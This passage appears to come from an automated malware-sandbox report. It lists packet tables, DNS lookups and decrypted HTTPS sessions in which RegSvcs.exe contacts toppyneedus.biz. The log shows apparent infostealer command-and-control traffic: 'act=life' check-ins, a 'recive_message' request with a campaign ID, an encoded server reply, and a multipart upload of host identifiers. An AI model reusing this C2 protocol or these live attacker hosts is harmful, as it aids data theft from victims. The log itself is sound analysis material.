                                                                            Jan 27, 2025 15:58:29.085665941 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085766077 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085789919 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085866928 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085877895 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.626049042 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.626149893 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.626220942 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.626332998 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.626348972 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.630964041 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.631006002 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:32.631088972 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.631388903 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:32.631403923 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.152525902 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.152601957 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.153860092 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.153868914 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.154122114 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.155380964 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.155422926 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.155455112 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.908894062 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.908971071 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.909013033 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.909209013 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.909221888 CET44349826104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:33.909235954 CET49826443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:33.909240007 CET44349826104.21.29.142192.168.2.7
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 27, 2025 15:58:13.293934107 CET5556353192.168.2.71.1.1.1
                                                                            Jan 27, 2025 15:58:13.300852060 CET53555631.1.1.1192.168.2.7
                                                                            Jan 27, 2025 15:58:20.435970068 CET5373853192.168.2.71.1.1.1
                                                                            Jan 27, 2025 15:58:20.449383974 CET53537381.1.1.1192.168.2.7
                                                                            Jan 27, 2025 15:58:20.506711006 CET6199953192.168.2.71.1.1.1
                                                                            Jan 27, 2025 15:58:20.515985966 CET53619991.1.1.1192.168.2.7
                                                                            Jan 27, 2025 15:58:20.519335032 CET6116853192.168.2.71.1.1.1
                                                                            Jan 27, 2025 15:58:20.530950069 CET53611681.1.1.1192.168.2.7
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 27, 2025 15:58:13.293934107 CET192.168.2.71.1.1.10x3cefStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:20.435970068 CET192.168.2.71.1.1.10x53daStandard query (0)grapeprivatter.cyouA (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:20.506711006 CET192.168.2.71.1.1.10x7eaStandard query (0)impolitewearr.bizA (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:20.519335032 CET192.168.2.71.1.1.10xccb6Standard query (0)toppyneedus.bizA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 27, 2025 15:58:13.300852060 CET1.1.1.1192.168.2.70x3cefNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:13.300852060 CET1.1.1.1192.168.2.70x3cefNo error (0)twc.trafficmanager.net104.40.149.189A (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:13.357811928 CET1.1.1.1192.168.2.70x323dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:13.357811928 CET1.1.1.1192.168.2.70x323dNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:13.357811928 CET1.1.1.1192.168.2.70x323dNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:13.357811928 CET1.1.1.1192.168.2.70x323dNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:20.449383974 CET1.1.1.1192.168.2.70x53daName error (3)grapeprivatter.cyounonenoneA (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:20.515985966 CET1.1.1.1192.168.2.70x7eaName error (3)impolitewearr.biznonenoneA (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:20.530950069 CET1.1.1.1192.168.2.70xccb6No error (0)toppyneedus.biz104.21.29.142A (IP address)IN (0x0001)false
                                                                            Jan 27, 2025 15:58:20.530950069 CET1.1.1.1192.168.2.70xccb6No error (0)toppyneedus.biz172.67.149.66A (IP address)IN (0x0001)false
                                                                            • toppyneedus.biz
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.749743104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:21 UTC262OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2025-01-27 14:58:21 UTC1125INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:21 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=89s7t6gt3fbfidba2pmmk71pp6; expires=Fri, 23 May 2025 08:45:00 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKhRUE1BHySfuCYfhK%2BiUWLSwG9inAivv4AYz5JY9cfjNpiCsYTyOMlHYewtA9161PD9%2Fv2sIRx5DCm8x9H4hBhwnlvr8YG%2FCdBecGNOYVwQmu%2BEwY6rT8EbNXu1pvVjRSo%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999b28d587ca8-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=1976&rtt_var=817&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1279018&cwnd=241&unsent_bytes=0&cid=0e9110c42e848d01&ts=541&x=0"
                                                                            2025-01-27 14:58:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2025-01-27 14:58:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.749751104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:22 UTC263OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 46
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:22 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 26 6a 3d
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=NNaWCM--WORK&j=
                                                                            2025-01-27 14:58:22 UTC1123INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:22 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=klmhb7gmtedirgm5memhr18f26; expires=Fri, 23 May 2025 08:45:01 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJ%2FtXVsdYnATLYaDQA4B7bizV7yKHk83l2NNEjqcNvNPeqx%2FVSB8Hb6UOLRZ93VgEOLKx3CfmxdpQ88KLiid7MxG%2BC4uxAV38bquqQ7e5ZKy8wkVDcPEMQweFM0vrre7bwk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999b94faa42ee-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1614&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=945&delivery_rate=1750599&cwnd=218&unsent_bytes=0&cid=b7419f22bec254da&ts=504&x=0"
                                                                            2025-01-27 14:58:22 UTC246INData Raw: 34 39 39 34 0d 0a 76 2b 6f 44 78 73 62 6b 50 50 4f 41 70 32 41 62 61 4e 6a 73 5a 42 54 65 74 30 34 69 77 42 49 54 61 4b 71 62 6b 68 4f 48 57 54 6a 45 79 48 58 6b 2f 4e 41 51 30 66 50 43 51 69 45 63 71 70 6b 42 4f 50 7a 57 4b 67 44 36 64 48 49 45 32 66 36 2b 4d 66 45 30 47 6f 57 4d 59 71 71 31 67 52 44 52 35 64 39 43 49 54 4f 6a 7a 67 46 36 2f 49 31 73 52 36 70 77 63 67 54 49 2b 76 6c 38 39 7a 56 62 31 34 5a 6b 72 71 4f 48 57 4a 4c 73 79 67 56 2b 44 62 6d 47 43 6e 32 7a 33 79 4d 41 37 44 42 32 45 6f 69 68 73 46 37 69 4c 56 6e 79 69 33 43 74 35 4a 6b 51 69 4b 4c 43 44 6a 6c 53 2b 6f 30 42 64 72 4c 52 4b 6b 6d 6f 65 6e 73 4d 79 66 2f 34 59 2b 34 2f 55 4e 65 49 5a 36 2b 70 6a 6b 79 66 35 73 30 4f 65 41 65 35 7a 6b 67 32 75 38 31 73
                                                                            Data Ascii: 4994v+oDxsbkPPOAp2AbaNjsZBTet04iwBITaKqbkhOHWTjEyHXk/NAQ0fPCQiEcqpkBOPzWKgD6dHIE2f6+MfE0GoWMYqq1gRDR5d9CITOjzgF6/I1sR6pwcgTI+vl89zVb14ZkrqOHWJLsygV+DbmGCn2z3yMA7DB2EoihsF7iLVnyi3Ct5JkQiKLCDjlS+o0BdrLRKkmoensMyf/4Y+4/UNeIZ6+pjkyf5s0OeAe5zkg2u81s
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 47 4f 49 6a 51 77 6e 5a 36 4f 56 38 39 54 30 61 77 73 5a 34 35 4b 4f 4b 48 73 6d 69 7a 51 35 33 44 37 6d 42 41 58 65 38 78 79 4e 41 6f 58 68 35 44 73 4c 32 2f 33 37 72 4d 56 33 56 67 57 61 72 6f 34 35 59 6e 75 47 46 54 44 6b 4e 6f 73 35 65 4e 70 7a 46 4c 30 4f 32 66 57 42 4b 31 37 66 70 4d 65 49 33 47 6f 58 49 5a 36 71 6c 69 31 36 44 36 73 34 4a 66 42 69 78 68 77 74 37 76 4e 67 6d 54 36 46 77 64 67 44 43 39 76 70 31 36 44 5a 63 33 59 67 68 36 75 53 42 52 74 47 36 68 53 46 38 47 72 32 43 45 44 53 47 6c 54 4d 4f 75 7a 42 32 42 6f 69 68 73 48 6e 67 4f 46 6e 57 68 32 4b 73 72 35 52 65 67 2b 54 49 42 32 73 4d 76 34 41 4d 64 61 37 66 49 6b 61 68 65 58 6f 44 7a 66 37 30 4d 61 74 37 58 63 58 49 4f 65 53 46 69 31 57 64 36 4e 49 43 4f 52 58 30 6c 30 5a 78 73 4a 56
                                                                            Data Ascii: GOIjQwnZ6OV89T0awsZ45KOKHsmizQ53D7mBAXe8xyNAoXh5DsL2/37rMV3VgWaro45YnuGFTDkNos5eNpzFL0O2fWBK17fpMeI3GoXIZ6qli16D6s4JfBixhwt7vNgmT6FwdgDC9vp16DZc3Ygh6uSBRtG6hSF8Gr2CEDSGlTMOuzB2BoihsHngOFnWh2Ksr5Reg+TIB2sMv4AMda7fIkaheXoDzf70Mat7XcXIOeSFi1Wd6NICORX0l0ZxsJV
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 58 31 4b 68 72 6e 33 61 61 56 6a 47 76 65 4c 64 61 65 75 78 47 75 53 37 4d 73 46 62 30 71 6c 77 42 38 32 75 39 6c 73 47 4f 4a 39 63 41 4c 4f 36 2f 39 38 35 6a 56 55 30 6f 31 75 72 4b 53 47 55 35 54 6d 7a 67 6c 36 42 37 36 63 44 48 61 30 30 43 31 4b 71 44 41 2f 53 73 2f 68 73 43 6d 6c 43 6b 33 57 79 6c 53 6e 71 6f 68 5a 68 36 4c 61 54 47 42 4b 76 59 4a 47 4c 76 7a 59 4a 45 57 6e 66 33 41 41 78 76 7a 36 66 65 30 31 57 63 2b 48 5a 61 53 6f 6a 6c 53 63 37 4d 45 4b 63 41 47 78 69 41 5a 33 74 70 56 69 41 4b 56 6f 4d 56 4b 49 7a 66 64 39 36 44 51 59 36 49 74 76 71 71 4f 51 48 6f 36 73 33 45 4a 2b 42 76 72 57 52 6e 71 31 31 53 64 4b 70 6e 42 32 42 38 33 36 39 33 4c 6f 50 46 44 54 6a 32 57 6f 72 59 74 59 6b 65 58 42 42 32 73 50 73 34 49 4b 4e 76 4b 56 4b 31 6a 69
                                                                            Data Ascii: X1Khrn3aaVjGveLdaeuxGuS7MsFb0qlwB82u9lsGOJ9cALO6/985jVU0o1urKSGU5Tmzgl6B76cDHa00C1KqDA/Ss/hsCmlCk3WylSnqohZh6LaTGBKvYJGLvzYJEWnf3AAxvz6fe01Wc+HZaSojlSc7MEKcAGxiAZ3tpViAKVoMVKIzfd96DQY6ItvqqOQHo6s3EJ+BvrWRnq11SdKpnB2B83693LoPFDTj2WorYtYkeXBB2sPs4IKNvKVK1ji
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 2f 31 73 43 6d 6c 4d 6c 50 50 68 6d 2b 74 71 59 42 57 6c 75 7a 49 43 58 38 42 76 59 6b 41 65 37 54 59 4b 55 4f 6a 64 48 73 59 79 2f 4c 36 66 4f 39 37 46 4a 32 50 65 65 54 38 78 6e 6d 64 79 39 55 5a 61 78 7a 36 6b 55 68 76 2f 4e 49 67 41 50 6f 77 63 67 58 42 39 76 68 35 36 6a 52 65 30 34 35 6e 71 61 47 4a 56 49 50 71 79 77 39 79 42 62 47 63 42 6e 75 34 32 53 68 49 71 58 6f 78 52 49 6a 2b 36 44 47 39 65 32 2f 51 68 32 47 6e 73 73 5a 42 33 2f 75 46 42 58 56 4b 34 73 34 4b 65 4c 7a 61 49 45 79 70 65 48 41 47 78 76 37 31 65 4f 30 7a 53 4e 79 4d 61 61 57 71 69 56 2b 56 35 38 41 47 66 67 36 38 67 55 59 34 2f 4e 49 30 41 50 6f 77 58 69 33 39 75 39 46 4c 70 53 51 55 78 4d 68 6d 71 4f 54 65 48 70 33 68 79 51 70 32 44 4c 4f 43 44 48 2b 33 32 53 64 45 72 6e 6c 30 44
                                                                            Data Ascii: /1sCmlMlPPhm+tqYBWluzICX8BvYkAe7TYKUOjdHsYy/L6fO97FJ2PeeT8xnmdy9UZaxz6kUhv/NIgAPowcgXB9vh56jRe045nqaGJVIPqyw9yBbGcBnu42ShIqXoxRIj+6DG9e2/Qh2GnssZB3/uFBXVK4s4KeLzaIEypeHAGxv71eO0zSNyMaaWqiV+V58AGfg68gUY4/NI0APowXi39u9FLpSQUxMhmqOTeHp3hyQp2DLOCDH+32SdErnl0D
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 33 39 7a 78 54 7a 34 5a 73 71 36 79 4f 56 35 44 6d 77 41 39 2f 42 72 43 50 41 58 69 79 33 57 77 4f 34 6e 64 70 53 70 43 35 30 57 48 2b 4b 55 7a 51 71 57 79 72 35 4a 6b 51 69 4b 4c 43 44 6a 6c 53 2b 6f 63 55 63 72 48 48 4a 55 65 73 66 33 49 59 79 66 54 37 59 2b 49 30 58 74 71 45 5a 36 75 69 68 31 75 62 37 73 49 48 63 67 57 32 7a 6b 67 32 75 38 31 73 47 4f 4a 65 65 68 6e 66 2b 76 35 36 38 79 41 61 77 73 5a 34 35 4b 4f 4b 48 73 6d 69 78 67 6c 79 44 72 71 43 42 6e 4b 78 31 54 35 50 70 58 64 34 41 64 72 7a 39 33 62 75 4d 31 48 53 6a 6e 4f 6f 71 70 52 62 67 2f 43 46 54 44 6b 4e 6f 73 35 65 4e 6f 72 53 50 46 43 68 4d 6b 41 63 79 2b 2f 37 66 4f 6c 37 52 5a 4f 52 49 61 4f 6f 78 67 62 52 35 4d 6f 4c 65 67 57 37 68 77 70 37 75 64 77 70 51 61 52 30 65 77 44 49 2f 2f
                                                                            Data Ascii: 39zxTz4Zsq6yOV5DmwA9/BrCPAXiy3WwO4ndpSpC50WH+KUzQqWyr5JkQiKLCDjlS+ocUcrHHJUesf3IYyfT7Y+I0XtqEZ6uih1ub7sIHcgW2zkg2u81sGOJeehnf+v568yAawsZ45KOKHsmixglyDrqCBnKx1T5PpXd4Adrz93buM1HSjnOoqpRbg/CFTDkNos5eNorSPFChMkAcy+/7fOl7RZORIaOoxgbR5MoLegW7hwp7udwpQaR0ewDI//
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 51 35 32 50 62 65 54 38 78 6c 32 57 34 63 51 49 63 41 61 31 69 51 4a 6b 74 74 49 2b 51 61 4e 37 66 41 62 49 39 50 31 37 35 44 4a 58 30 59 56 6d 6f 36 75 44 48 74 2b 69 77 68 6f 35 55 76 71 76 43 33 32 77 6a 6e 59 41 76 54 35 6f 53 73 2f 31 73 43 6d 6c 4f 31 44 59 67 6d 79 6e 71 34 56 4d 6b 4f 54 58 41 6e 51 41 71 49 51 4e 63 37 48 59 49 55 4f 6b 64 6e 6f 47 32 76 44 77 63 75 35 37 46 4a 32 50 65 65 54 38 78 6e 32 47 39 4d 38 46 64 52 79 78 6a 77 56 67 73 63 56 73 44 75 4a 68 64 68 75 49 6f 65 5a 68 38 6a 78 46 6b 35 45 68 6f 36 6a 47 42 74 48 6b 7a 41 52 2b 44 4c 53 63 41 33 43 7a 32 69 56 4a 70 6e 68 79 43 73 7a 39 39 33 54 6d 4e 31 48 61 69 32 36 67 72 59 68 58 6e 71 4b 4c 51 6e 34 53 2b 74 5a 47 56 36 66 57 49 45 33 69 62 7a 38 54 69 50 37 38 4d 62 31
                                                                            Data Ascii: Q52PbeT8xl2W4cQIcAa1iQJkttI+QaN7fAbI9P175DJX0YVmo6uDHt+iwho5UvqvC32wjnYAvT5oSs/1sCmlO1DYgmynq4VMkOTXAnQAqIQNc7HYIUOkdnoG2vDwcu57FJ2PeeT8xn2G9M8FdRyxjwVgscVsDuJhdhuIoeZh8jxFk5Eho6jGBtHkzAR+DLScA3Cz2iVJpnhyCsz993TmN1Hai26grYhXnqKLQn4S+tZGV6fWIE3ibz8TiP78Mb1
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 45 47 76 73 6f 4e 5a 68 36 44 77 41 58 63 45 76 5a 68 47 61 59 4f 62 62 45 2b 34 4d 43 6b 7a 30 62 6e 33 66 61 56 6a 47 73 69 50 59 61 4f 2b 6b 46 6d 64 38 38 34 50 64 53 69 31 69 52 42 31 73 39 59 39 53 65 35 37 66 45 71 47 75 66 64 70 70 57 4d 61 38 6f 39 33 70 34 75 46 54 35 69 69 69 30 4a 2b 48 50 72 57 52 6b 6a 38 78 79 39 51 6f 58 39 67 4e 49 69 68 36 55 2b 6c 4d 45 7a 61 6d 47 4b 79 72 34 74 53 67 4e 79 46 57 69 31 59 36 4e 78 55 4a 4b 4f 56 4d 33 2f 73 4d 48 42 4b 6b 4d 44 70 4d 66 4e 37 41 6f 2f 47 49 62 62 6b 33 68 37 57 34 64 63 51 66 77 6d 73 6a 55 46 49 67 76 49 36 53 71 56 67 64 68 33 48 75 62 34 78 36 6e 73 43 35 4d 68 6f 6f 37 2b 58 53 4a 7a 79 77 6b 4a 47 52 50 71 57 52 69 37 38 34 43 39 4f 72 48 64 6e 47 34 58 65 35 6e 76 69 4b 31 33 4b
                                                                            Data Ascii: EGvsoNZh6DwAXcEvZhGaYObbE+4MCkz0bn3faVjGsiPYaO+kFmd884PdSi1iRB1s9Y9Se57fEqGufdppWMa8o93p4uFT5iii0J+HPrWRkj8xy9QoX9gNIih6U+lMEzamGKyr4tSgNyFWi1Y6NxUJKOVM3/sMHBKkMDpMfN7Ao/GIbbk3h7W4dcQfwmsjUFIgvI6SqVgdh3Hub4x6nsC5Mhoo7+XSJzywkJGRPqWRi784C9OrHdnG4Xe5nviK13K
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 53 54 56 5a 33 6b 79 42 63 32 47 36 79 4e 45 48 48 77 33 54 31 4e 72 6a 42 4f 52 49 6a 68 73 43 6d 6c 44 6c 6e 54 68 6d 61 79 74 63 74 2b 6d 75 37 47 44 6e 67 4e 2b 73 42 47 63 50 79 4e 66 77 37 69 64 47 42 4b 6b 4b 6d 69 4b 72 42 6f 44 59 33 61 66 75 71 39 78 6b 6a 52 75 70 64 4d 4f 52 6a 36 31 6b 59 78 76 38 63 2b 52 71 46 6d 63 6b 33 32 78 2f 46 38 36 6e 64 55 31 6f 68 6d 74 4c 4b 64 45 70 6e 68 33 78 68 48 4e 4a 47 43 41 48 47 6d 30 69 70 6d 67 6a 41 2f 53 73 65 35 71 45 69 6c 63 78 72 69 78 69 47 38 35 4e 34 65 70 4f 48 4c 44 48 34 63 71 38 4d 75 56 59 62 76 62 6d 79 6c 5a 54 4d 2b 7a 2b 6e 68 65 75 67 33 47 70 50 49 5a 2b 54 38 31 68 44 52 35 74 52 43 49 56 72 6f 31 56 4d 6c 36 34 56 2b 58 2b 78 70 4d 52 79 49 6f 61 49 2f 70 53 6b 61 68 63 67 6d 70
                                                                            Data Ascii: STVZ3kyBc2G6yNEHHw3T1NrjBORIjhsCmlDlnThmaytct+mu7GDngN+sBGcPyNfw7idGBKkKmiKrBoDY3afuq9xkjRupdMORj61kYxv8c+RqFmck32x/F86ndU1ohmtLKdEpnh3xhHNJGCAHGm0ipmgjA/Sse5qEilcxrixiG85N4epOHLDH4cq8MuVYbvbmylZTM+z+nheug3GpPIZ+T81hDR5tRCIVro1VMl64V+X+xpMRyIoaI/pSkahcgmp
                                                                            2025-01-27 14:58:22 UTC1369INData Raw: 52 38 49 56 61 4f 55 32 30 67 77 64 31 73 74 59 2b 55 71 52 7a 5a 77 6d 50 78 38 35 55 36 44 5a 66 30 34 39 66 6d 6f 57 4d 54 70 7a 74 77 6b 42 5a 44 61 79 4e 4f 45 69 4c 78 43 74 51 34 46 5a 79 48 4d 75 35 76 6a 48 39 65 77 4b 64 71 57 75 30 71 59 6c 5a 30 38 4c 43 46 48 70 4b 39 4d 34 43 4e 75 53 56 43 55 32 76 64 58 38 4e 69 74 6a 36 59 65 67 30 58 5a 2b 6f 5a 72 4b 6e 78 68 44 52 37 6f 56 61 4f 51 75 77 6e 67 74 35 75 35 6b 72 57 71 55 77 50 30 72 47 75 61 67 78 35 44 46 4b 30 49 64 6d 36 4b 4b 49 55 4e 48 39 69 78 73 35 48 50 72 57 56 54 6a 38 78 32 77 59 34 6a 64 79 47 4e 72 2f 38 32 66 6d 66 47 54 6a 70 58 4f 6a 74 49 55 63 6f 4f 2f 42 46 47 77 4a 71 6f 6b 34 53 4a 48 48 4b 31 43 68 4d 6b 41 63 79 2f 6e 2b 64 71 56 31 47 73 58 49 4f 65 53 4a 6c 46
                                                                            Data Ascii: R8IVaOU20gwd1stY+UqRzZwmPx85U6DZf049fmoWMTpztwkBZDayNOEiLxCtQ4FZyHMu5vjH9ewKdqWu0qYlZ08LCFHpK9M4CNuSVCU2vdX8Nitj6Yeg0XZ+oZrKnxhDR7oVaOQuwngt5u5krWqUwP0rGuagx5DFK0Idm6KKIUNH9ixs5HPrWVTj8x2wY4jdyGNr/82fmfGTjpXOjtIUcoO/BFGwJqok4SJHHK1ChMkAcy/n+dqV1GsXIOeSJlF


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.749759104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:23 UTC279OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=69MNZEJ5HAECH070
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12831
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:23 UTC12831OUTData Raw: 2d 2d 36 39 4d 4e 5a 45 4a 35 48 41 45 43 48 30 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 36 39 4d 4e 5a 45 4a 35 48 41 45 43 48 30 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 39 4d 4e 5a 45 4a 35 48 41 45 43 48 30 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 0d 0a 2d 2d 36 39 4d
                                                                            Data Ascii: --69MNZEJ5HAECH070Content-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--69MNZEJ5HAECH070Content-Disposition: form-data; name="pid"2--69MNZEJ5HAECH070Content-Disposition: form-data; name="lid"NNaWCM--WORK--69M
                                                                            2025-01-27 14:58:24 UTC1122INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:24 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=7hrkinfh2us9je844b4sd44fdn; expires=Fri, 23 May 2025 08:45:02 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
